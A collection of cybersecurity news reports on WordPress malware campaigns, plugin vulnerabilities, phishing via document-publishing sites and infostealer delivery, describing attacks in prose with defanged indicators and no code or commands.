Mar 22, 2024NewsroomWeb Security / Vulnerability

A massive malware campaign dubbed Sign1 has compromised over 39,000 WordPress sites in the last six months, using malicious JavaScript injections to redirect users to scam sites.

The most recent variant of the malware is estimated to have infected no less than 2,500 sites over the past two months alone, Sucuri said in a report published this week.

The attacks entail injecting rogue JavaScript into legitimate HTML widgets and plugins that allow for arbitrary JavaScript and other code to be inserted, providing attackers with an opportunity to add their malicious code.

The XOR-encoded JavaScript code is subsequently decoded and used to execute a JavaScript file hosted on a remote server, which ultimately facilitates redirects to a VexTrio-operated traffic distribution system (TDS) but only if certain criteria are met.

What’s more, the malware uses time-based randomization to fetch dynamic URLs that change every 10 minutes to get around blocklists. These domains are registered a few days prior to their use in attacks.

“One of the most noteworthy things about this code is that it is specifically looking to see if the visitor has come from any major websites such as Google, Facebook, Yahoo, Instagram etc.,” security researcher Ben Martin said. “If the referrer does not match to these major sites, then the malware will not execute.”

Site visitors are then taken to other scam sites by executing another JavaScript from the same server.

The Sign1 campaign, first detected in the second half of 2023, has witnessed several iterations, with the attackers leveraging as many as 15 different domains since July 31, 2023.

It’s suspected that WordPress sites have been taken over by means of a brute-force attack, although adversaries could also leverage security flaws in plugins and themes to obtain access.

“Many of the injections are found inside WordPress custom HTML widgets that the attackers add to compromised websites,” Martin said. “Quite often, the attackers install a legitimate Simple Custom CSS and JS plugin and inject the malicious code using this plugin.”

This approach of not placing any malicious code into server files allows the malware to stay undetected for extended periods of time, Sucuri said.

Mar 19, 2024NewsroomEmail Security / Social Engineering

Threat actors are leveraging digital document publishing (DDP) sites hosted on platforms like FlipSnack, Issuu, Marq, Publuu, RelayTo, and Simplebooklet for carrying out phishing, credential harvesting, and session token theft, once again underscoring how threat actors are repurposing legitimate services for malicious ends.

“Hosting phishing lures on DDP sites increases the likelihood of a successful phishing attack, since these sites often have a favorable reputation, are unlikely to appear on web filter blocklists, and may instill a false sense of security in users who recognize them as familiar or legitimate,” Cisco Talos researcher Craig Jackson said last week.

While adversaries have used popular cloud-based services such as Google Drive, OneDrive, Dropbox, SharePoint, DocuSign, and Oneflow to host phishing documents in the past, the latest development marks an escalation designed to evade email security controls.

DDP services allow users to upload and share PDF files in a browser-based interactive flipbook format, adding page flip animations and other skeuomorphic effects to any catalog, brochure, or magazine.

Threat actors have been found to abuse the free tier or a no-cost trial period offered by these services to create multiple accounts and publish malicious documents.

Besides exploiting their favorable domain reputation, the attackers take advantage of the fact that DDP sites facilitate transient file hosting, thereby allowing published content to automatically become unavailable after a predefined expiration date and time.

What’s more, productivity features baked into DDP sites like Publuu could act as a deterrent, preventing the extraction and detection of malicious links in phishing messages.

In the incidents analyzed by Cisco Talos, DDP sites are integrated into the attack chain in the secondary or intermediate stage, typically by embedding a link to a document hosted on a legitimate DDP site in a phishing email.

The DDP-hosted document serves as a gateway to an external, adversary-controlled site either directly by clicking on a link included in the decoy file, or through a series of redirects that also require solving CAPTCHAs to thwart automated analysis efforts.

The final landing page is a bogus site mimicking the Microsoft 365 login page, thus allowing the attackers to steal credentials or session tokens.

“DDP sites could represent a blind spot for defenders, because they are unfamiliar to trained users and unlikely to be flagged by email and web content filtering controls,” Jackson said.

“DDP sites create advantages for threat actors seeking to thwart contemporary phishing protections. The same features and benefits that attract legitimate users to these sites can be abused by threat actors to increase the efficacy of a phishing attack.”

Cybersecurity researchers have discovered a new malware campaign that leverages bogus Google Sites pages and HTML smuggling to distribute a commercial malware called AZORult in order to facilitate information theft.

“It uses an unorthodox HTML smuggling technique where the malicious payload is embedded in a separate JSON file hosted on an external website,” Netskope Threat Labs researcher Jan Michael Alcantara said in a report published last week.

The phishing campaign has not been attributed to a specific threat actor or group. The cybersecurity company described it as widespread in nature, carried out with an intent to collect sensitive data for selling them in underground forums.

AZORult, also called PuffStealer and Ruzalto, is an information stealer first detected around 2016. It’s typically distributed via phishing and malspam campaigns, trojanized installers for pirated software or media, and malvertising.

Once installed, it’s capable of gathering credentials, cookies, and history from web browsers, screenshots, documents matching a list of specific extensions (.TXT, .DOC, .XLS, .DOCX, .XLSX, .AXX, and .KDBX), and data from 137 cryptocurrency wallets. AXX files are encrypted files created by AxCrypt, while KDBX refers to a password database created by the KeePass password manager.

The latest attack activity involves the threat actor creating counterfeit Google Docs pages on Google Sites that subsequently utilize HTML smuggling to deliver the payload.

HTML smuggling is the name given to a stealthy technique in which legitimate HTML5 and JavaScript features are abused to assemble and launch the malware by “smuggling” an encoded malicious script.

Thus, when a visitor is tricked into opening the rogue page from a phishing email, the browser decodes the script and extracts the payload on the host device, effectively bypassing typical security controls such as email gateways that are known to only inspect for suspicious attachments.

The AZORult campaign takes this approach a notch higher by adding a CAPTCHA barrier, an approach that not only gives a veneer of legitimacy but also serves as an additional layer of protection against URL scanners.

The downloaded file is a shortcut file (.LNK) that masquerades as a PDF bank statement, launching which kicks off a series of actions to execute a series of intermediate batch and PowerShell scripts from an already compromised domain.

One of the PowerShell scripts (“agent3.ps1”) is designed to fetch the AZORult loader (“service.exe”), which, in turn, downloads and executes another PowerShell script (“sd2.ps1”) containing the stealer malware.

“It executes the fileless AZORult infostealer stealthily by using reflective code loading, bypassing disk-based detection and minimizing artifacts,” Michael Alcantara said. “It uses an AMSI bypass technique to evade being detected by a variety of host-based anti-malware products, including Windows Defender.”

“Unlike common smuggling files where the blob is already inside the HTML code, this campaign copies an encoded payload from a separate compromised site. Using legitimate domains like Google Sites can help trick the victim into believing the link is legitimate.”

The findings come as Cofense revealed the use of malicious SVG files by threat actors in recent campaigns to disseminate Agent Tesla and XWorm using an open-source program called AutoSmuggle that simplifies the process of crafting HTML or SVG smuggled files.

AutoSmuggle “takes a file such as an exe or an archive and ‘smuggles’ it into the SVG or HTML file so that when the SVG or HTML file is opened, the ‘smuggled’ file is delivered,” the company explained.

Phishing campaigns have also been observed employing shortcut files packed within archive files to propagate LokiBot, an information stealer analogous to AZORult with features to harvest data from web browsers and cryptocurrency wallets.

“The LNK file executes a PowerShell script to download and execute the LokiBot loader executable from a URL. LokiBot malware has been observed using image steganography, multi-layered packing and living-off-the-land (LotL) techniques in past campaigns,” SonicWall disclosed last week.

In another instance highlighted by Docguard, malicious shortcut files have been found to initiate a series of payload downloads and ultimately deploy AutoIt-based malware.

That’s not all. Users in the Latin American region are being targeted as part of an ongoing campaign in which the attackers impersonate Colombian government agencies to send booby-trapped emails with PDF documents that accuse the recipients of flouting traffic rules.

Present within the PDF file is a link that, upon click, results in the download of a ZIP archive containing a VBScript. When executed, the VBScript drops a PowerShell script responsible for fetching one of the remote access trojans like AsyncRAT, njRAT, and Remcos.

Mar 12, 2024NewsroomWordPress / Website Security

A new malware campaign is leveraging a high-severity security flaw in the Popup Builder plugin for WordPress to inject malicious JavaScript code.

According to Sucuri, the campaign has infected more than 3,900 sites over the past three weeks.

“These attacks are orchestrated from domains less than a month old, with registrations dating back to February 12th, 2024,” security researcher Puja Srivastava said in a report dated March 7.

Infection sequences involve the exploitation of CVE-2023-6000, a security vulnerability in Popup Builder that could be exploited to create rogue admin users and install arbitrary plugins.

The shortcoming was exploited as part of a Balada Injector campaign earlier this January, compromising no less than 7,000 sites.

The latest set of attacks lead to the injection of malicious code, which comes in two different variants and is designed to redirect site visitors to other sites such as phishing and scam pages.

WordPress site owners are recommended to keep their plugins up-to-date as well as scan their sites for any suspicious code or users, and perform appropriate cleanup.

“This new malware campaign serves as a stark reminder of the risks of not keeping your website software patched and up-to-date,” Srivastava said.

The development comes as WordPress security firm Wordfence disclosed a high-severity bug in another plugin known as Ultimate Member that can be weaponized to inject malicious web scripts.

The cross-site scripting (XSS) flaw, tracked as CVE-2024-2123 (CVSS score: 7.2), impacts all versions of the plugin, including and prior to 2.8.3. It has been patched in version 2.8.4, released on March 6, 2024.

The flaw stems from insufficient input sanitization and output escaping, thereby allowing unauthenticated attackers to inject arbitrary web scripts in pages that will be executed every time a user visits them.

“Combined with the fact that the vulnerability can be exploited by attackers with no privileges on a vulnerable site, this means that there is a high chance that unauthenticated attackers could gain administrative user access on sites running the vulnerable version of the plugin when successfully exploited,” Wordfence said.

It’s worth noting that the plugin maintainers addressed a similar flaw (CVE-2024-1071, CVSS score: 9.8) in version 2.8.3 released on February 19.

It also follows the discovery of an arbitrary file upload vulnerability in the Avada WordPress theme (CVE-2024-1468, CVSS score: 8.8) and possibly executes malicious code remotely. It has been resolved in version 7.11.5.

“This makes it possible for authenticated attackers, with contributor-level access and above, to upload arbitrary files on the affected site’s server which may make remote code execution possible,” Wordfence said.

Mar 07, 2024NewsroomVulnerability / Web Security

Threat actors are conducting brute-force attacks against WordPress sites by leveraging malicious JavaScript injections, new findings from Sucuri reveal.

The attacks, which take the form of distributed brute-force attacks, “target WordPress websites from the browsers of completely innocent and unsuspecting site visitors,” security researcher Denis Sinegubko said.

The activity is part of a previously documented attack wave in which compromised WordPress sites were used to inject crypto drainers such as Angel Drainer directly or redirect site visitors to Web3 phishing sites containing drainer malware.

The latest iteration is notable for the fact that the injections – found on over 700 sites to date – don’t load a drainer but rather use a list of common and leaked passwords to brute-force other WordPress sites.

The attack unfolds over five stages, enabling a threat actor to take advantage of already compromised websites to launch distributed brute-force attacks against other potential victim sites –

• Obtaining a list of target WordPress sites
• Extracting real usernames of authors that post on those domains
• Inject the malicious JavaScript code to already infected WordPress sites
• Launching a distributed brute-force attack on the target sites via the browser when visitors land on the hacked sites
• Gaining unauthorized access to the target sites

“For every password in the list, the visitor’s browser sends the wp.uploadFile XML-RPC API request to upload a file with encrypted credentials that were used to authenticate this specific request,” Sinegubko explained. “If authentication succeeds, a small text file with valid credentials is created in the WordPress uploads directory.”

It’s currently not known what prompted the threat actors to switch from crypto drainers to distributed brute-force attack, although it’s believed that the change may have been driven by profit motives, as compromised WordPress sites could be monetized in various ways.

That said, crypto wallet drainers have led to losses amounting to hundreds of millions in digital assets in 2023, according to data from Scam Sniffer. The Web3 anti-scam solution provider has since revealed that drainers are exploiting the normalization process in the wallet’s EIP-712 encoding procedure to bypass security alerts.

The development comes as the DFIR report revealed that threat actors are exploiting a critical flaw in a WordPress plugin named 3DPrint Lite (CVE-2021-4436, CVSS score: 9.8) to deploy the Godzilla web shell for persistent remote access.

It also follows a new SocGholish (aka FakeUpdates) campaign targeting WordPress websites in which the JavaScript malware is distributed via modified versions of legitimate plugins that are installed by taking advantage of compromised admin credentials.

“Although there have been a variety of maliciously modified plugins and several different fake-browser update campaigns, the goal of course is always the same: To trick unsuspecting website visitors into downloading remote access trojans that will later be used as the initial point of entry for a ransomware attack,” security researcher Ben Martin said.

Mar 07, 2024NewsroomMalware / Network Security

Threat actors have been leveraging fake websites advertising popular video conferencing software such as Google Meet, Skype, and Zoom to deliver a variety of malware targeting both Android and Windows users since December 2023.

“The threat actor is distributing Remote Access Trojans (RATs) including SpyNote RAT for Android platforms, and NjRAT and DCRat for Windows systems,” Zscaler ThreatLabz researchers said.

The spoofed sites are in Russian and are hosted on domains that closely resemble their legitimate counterparts, indicating that the attackers are using typosquatting tricks to lure prospective victims into downloading the malware.

They also come with options to download the app for Android, iOS, and Windows platforms. While clicking on the button for Android downloads an APK file, clicking on the Windows app button triggers the download of a batch script.

The malicious batch script is responsible for executing a PowerShell script, which, in turn, downloads and executes the remote access trojan.

Currently, there is no evidence that the threat actor is targeting iOS users, given that clicking on the button for the iOS app takes the user to the legitimate Apple App Store listing for Skype.

“A threat actor is using these lures to distribute RATs for Android and Windows, which can steal confidential information, log keystrokes, and steal files,” the researchers said.

The development comes as the AhnLab Security Intelligence Center (ASEC) revealed that a new malware dubbed WogRAT targeting both Windows and Linux is abusing a free online notepad platform called aNotepad as a covert vector for hosting and retrieving malicious code.

It’s said to be active from at least late 2022, targeting Asian countries like China, Hong Kong, Japan, and Singapore, among others. That said, it’s currently not known how the malware is distributed in the wild.

“When WogRAT is run for the first time, it collects basic information of the infected system and sends them to the C&C server,” ASEC said. “The malware then supports commands such as executing commands, sending results, downloading files, and uploading these files.”

It also coincides with high-volume phishing campaigns orchestrated by a financially motivated cybercriminal actor known as TA4903 to steal corporate credentials and likely follow them with business email compromise (BEC) attacks. The adversary has been active since at least 2019, with the activities intensifying post mid-2023.

“TA4903 routinely conducts campaigns spoofing various U.S. government entities to steal corporate credentials,” Proofpoint said. “The actor also spoofs organizations in various sectors including construction, finance, healthcare, food and beverage, and others.”

Attack chains involve the use of QR codes (aka quishing) for credential phishing as well as relying on the EvilProxy adversary-in-the-middle (AiTM) phishing kit to bypass two-factor authentication (2FA) protections.

Once a target mailbox is compromised, the threat actor has been observed searching for information relevant to payments, invoices, and bank information, with the ultimate goal of hijacking existing email threads and performing invoice fraud.

Phishing campaigns have also functioned as a conduit for other malware families like DarkGate, Agent Tesla, and Remcos RAT, the last of which leverages steganographic decoys to drop the malware on compromised hosts.

Feb 27, 2024NewsroomVulnerability / Website Security

A security vulnerability has been disclosed in the LiteSpeed Cache plugin for WordPress that could enable unauthenticated users to escalate their privileges.

Tracked as CVE-2023-40000, the vulnerability was addressed in October 2023 in version 5.7.0.1.

“This plugin suffers from unauthenticated site-wide stored [cross-site scripting] vulnerability and could allow any unauthenticated user from stealing sensitive information to, in this case, privilege escalation on the WordPress site by performing a single HTTP request,” Patchstack researcher Rafie Muhammad said.

LiteSpeed Cache, which is used to improve site performance, has more than five million installations. The latest version of the plugin in 6.1, which was released on February 5, 2024.

The WordPress security company said CVE-2023-40000 is the result of a lack of user input sanitization and escaping output. The vulnerability is rooted in a function named update_cdn_status() and can be reproduced in a default installation.

“Since the XSS payload is placed as an admin notice and the admin notice could be displayed on any wp-admin endpoint, this vulnerability also could be easily triggered by any user that has access to the wp-admin area,” Muhammad said.

The disclosure arrives four months after Wordfence revealed another XSS flaw in the same plugin (CVE-2023-4372, CVSS score: 6.4) due to insufficient input sanitization and output escaping on user supplied attributes. It was addressed in version 5.7.

“This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page,” István Márton said.

Feb 20, 2024NewsroomWebsite Security / PHP Code

A critical security flaw in the Bricks theme for WordPress is being actively exploited by threat actors to run arbitrary PHP code on susceptible installations.

The flaw, tracked as CVE-2024-25600 (CVSS score: 9.8), enables unauthenticated attackers to achieve remote code execution. It impacts all versions of the Bricks up to and including 1.9.6.

It has been addressed by the theme developers in version 1.9.6.1 released on February 13, 2024, merely days after WordPress security provider Snicco reported the flaw on February 10.

While a proof-of-concept (PoC) exploit has not been released, technical details have been released by both Snicco and Patchstack, noting that the underlying vulnerable code exists in the prepare_query_vars_from_settings() function.

Specifically, it concerns the use of security tokens called “nonces” for verifying permissions, which can then be used to pass arbitrary commands for execution, effectively allowing a threat actor to seize control of a targeted site.

The nonce value is publicly available on the frontend of a WordPress site, Patchstack said, adding there are no adequate role checks applied.

“Nonces should never be relied on for authentication, authorization, or access control,” WordPress cautions in its documentation. “Protect your functions using current_user_can(), and always assume nonces can be compromised.”

WordPress security company Wordfence said it detected over three dozen attack attempts exploiting the flaw as of February 19, 2024. Exploitation attempts are said to have commenced on February 14, a day after public disclosure.

A majority of the attacks are from the following IP addresses –

• 200.251.23[.]57
• 92.118.170[.]216
• 103.187.5[.]128
• 149.202.55[.]79
• 5.252.118[.]211
• 91.108.240[.]52

Bricks is estimated to have around 25,000 currently active installations. Users of the plugin are recommended to apply the latest patches to mitigate potential threats.

Jan 15, 2024NewsroomWebsite Security / Vulnerability

Thousands of WordPress sites using a vulnerable version of the Popup Builder plugin have been compromised with a malware called Balada Injector.

First documented by Doctor Web in January 2023, the campaign takes place in a series of periodic attack waves, weaponizing security flaws WordPress plugins to inject backdoor designed to redirect visitors of infected sites to bogus tech support pages, fraudulent lottery wins, and push notification scams.

Subsequent findings unearthed by Sucuri have revealed the massive scale of the operation, which is said to have been active since 2017 and infiltrated no less than 1 million sites since then.

The GoDaddy-owned website security company, which detected the latest Balada Injector activity on December 13, 2023, said it identified the injections on over 7,100 sites.

These attacks take advantage of a high-severity flaw in Popup Builder (CVE-2023-6000, CVSS score: 8.8) – a plugin with more than 200,000 active installs – that was publicly disclosed by WPScan a day before. The issue was addressed in version 4.2.3.

“When successfully exploited, this vulnerability may let attackers perform any action the logged‑in administrator they targeted is allowed to do on the targeted site, including installing arbitrary plugins, and creating new rogue Administrator users,” WPScan researcher Marc Montpas said.

The ultimate goal of the campaign is to insert a malicious JavaScript file hosted on specialcraftbox[.]com and use it to take control of the website and load additional JavaScript in order to facilitate malicious redirects.

Furthermore, the threat actors behind Balada Injector are known to establish persistent control over compromised sites by uploading backdoors, adding malicious plugins, and creating rogue blog administrators.

This is often accomplished by using the JavaScript injections to specifically target logged-in site administrators.

“The idea is when a blog administrator logs into a website, their browser contains cookies that allow them to do all their administrative tasks without having to authenticate themselves on every new page,” Sucuri researcher Denis Sinegubko noted last year.

“So, if their browser loads a script that tries to emulate administrator activity, it will be able to do almost anything that can be done via the WordPress admin interface.”

The new wave is no exception in that if logged-in admin cookies are detected, it weaponizes the elevated privileges to install and activate a rogue backdoor plugin (“wp-felody.php” or “Wp Felody”) so as to fetch a second-stage payload from the aforementioned domain.

The payload, another backdoor, is saved under the name “sasas” to the directory where temporary files are stored, and is then executed and deleted from disk.

“It checks up to three levels above the current directory, looking for the root directory of the current site and any other sites that may share the same server account,” Sinegubko said.

“Then, in the detected site root directories, it modifies the wp-blog-header.php file to inject the same Balada JavaScript malware as was originally injected via the Popup Builder vulnerability.”

Dec 22, 2023NewsroomSkimming / Web Security

Threat hunters have discovered a rogue WordPress plugin that’s capable of creating bogus administrator users and injecting malicious JavaScript code to steal credit card information.

The skimming activity is part of a Magecart campaign targeting e-commerce websites, according to Sucuri.

“As with many other malicious or fake WordPress plugins it contains some deceptive information at the top of the file to give it a veneer of legitimacy,” security researcher Ben Martin said. “In this case, comments claim the code to be ‘WordPress Cache Addons.'”

Malicious plugins typically find their way to WordPress sites via either a compromised admin user or the exploitation of security flaws in another plugin already installed on the site.

Post installation, the plugin replicates itself to the mu-plugins (or must-use plugins) directory so that it’s automatically enabled and conceals its presence from the admin panel.

“Since the only way to remove any of the mu-plugins is by manually removing the file the malware goes out of its way to prevent this,” Martin explained. “The malware accomplishes this by unregistering callback functions for hooks that plugins like this normally use.”

The fraudulent plugin also comes with an optionF to create and hide an administrator user account from the legitimate website admin to avoid raising red flags and have sustained access to the target for extended periods of time.

The ultimate objective of the campaign is to inject credit card stealing malware in the checkout pages and exfiltrate the information to an actor-controlled domain.

“Since many WordPress infections occur from compromised wp-admin administrator users it only stands to reason that they’ve needed to work within the constraints of the access levels that they have, and installing plugins is certainly one of the key abilities that WordPress admins possess,” Martin said.

The disclosure arrives weeks after the WordPress security community warned of a phishing campaign that alerts users of an unrelated security flaw in the web content management system and tricks them into installing a plugin under the guise of a patch. The plugin, for its part, creates an admin user and deploys a web shell for persistent remote access.

Sucuri said that the threat actors behind the campaign are leveraging the “RESERVED” status associated with a CVE identifier, which happens when it has been reserved for use by a CVE Numbering Authority (CNA) or security researcher, but the details are yet to be filled.

It also comes as the website security firm discovered another Magecart campaign that uses the WebSocket communications protocol to insert the skimmer code on online storefronts. The malware then gets triggered upon clicking a fake “Complete Order” button that’s overlaid on top of the legitimate checkout button.

Europol’s spotlight report on online fraud released this week described digital skimming as a persistent threat that results in the theft, re-sale, and misuse of credit card data. “A major evolution in digital skimming is the shift from the use of front-end malware to back-end malware, making it more difficult to detect,” it said.

The E.U. law enforcement agency said it also notified 443 online merchants that their customers’ credit card or payment card data had been compromised via skimming attacks.

Group-IB, which also partnered with Europol on the cross-border cybercrime fighting operation codenamed Digital Skimming Action, said it detected and identified 23 families of JS-sniffers, including ATMZOW, health_check, FirstKiss, FakeGA, AngryBeaver, Inter, and R3nin, which were used against companies in 17 different countries across Europe and the Americas.

“In total, 132 JS-sniffer families are known, as of the end of 2023, to have compromised websites worldwide,” the Singapore-headquartered firm added.

That’s not all. Bogus ads on Google Search and Twitter for cryptocurrency platforms have been found to promote a cryptocurrency drainer named MS Drainer that’s estimated to have already plundered $58.98 million from 63,210 victims since March 2023 via a network of 10,072 phishing websites.

“By targeting specific audiences through Google search terms and the following base of X, they can select specific targets and launch continuous phishing campaigns at a very low cost,” ScamSniffer said.